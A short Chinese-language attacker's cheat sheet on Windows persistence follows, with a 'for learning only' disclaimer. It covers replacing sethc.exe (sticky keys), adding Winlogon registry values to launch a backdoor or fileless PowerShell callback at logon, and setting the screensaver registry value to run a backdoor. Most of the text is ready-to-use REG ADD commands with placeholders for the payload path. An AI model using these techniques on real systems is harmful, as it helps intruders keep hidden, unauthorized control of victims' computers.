免责声明;本文仅做技术交流与学习,,,

目录

粘滞键:

粘滞键位置：

 屏保&登录:

1、WinLogon配合无文件落地上线

结合ps命令:

2、屏幕保护生效后执行后门

---

粘滞键:

Windows维权之粘滞键项维权-腾讯云开发者社区-腾讯云 (tencent.com)

系统自带的辅助功能进行替换执行，放大镜，旁白，屏幕键盘等均可。 

(需要系统权限)

粘滞键位置：

c:\windows\system32\sethc.exe

详细见网址

---

 屏保&登录:

1、WinLogon配合无文件落地上线

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "名称" /t REG_SZ /F /D "后门路径"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "test001" /t REG_SZ /F /D "2"

--重新登录--切换登录就上线.

结合ps命令:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "userse" /t REG_SZ /F /D "xxx,ps命令"

-结合powershell,执行命令的都可以在后面加上ps的上线后门.        命令,ps命令 

---

2、屏幕保护生效后执行后门

(Administrator权限就可以)

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v 名称 /t REG_SZ /d "值(路径)" /f


reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE /t REG_SZ /d "222222" /f

 

---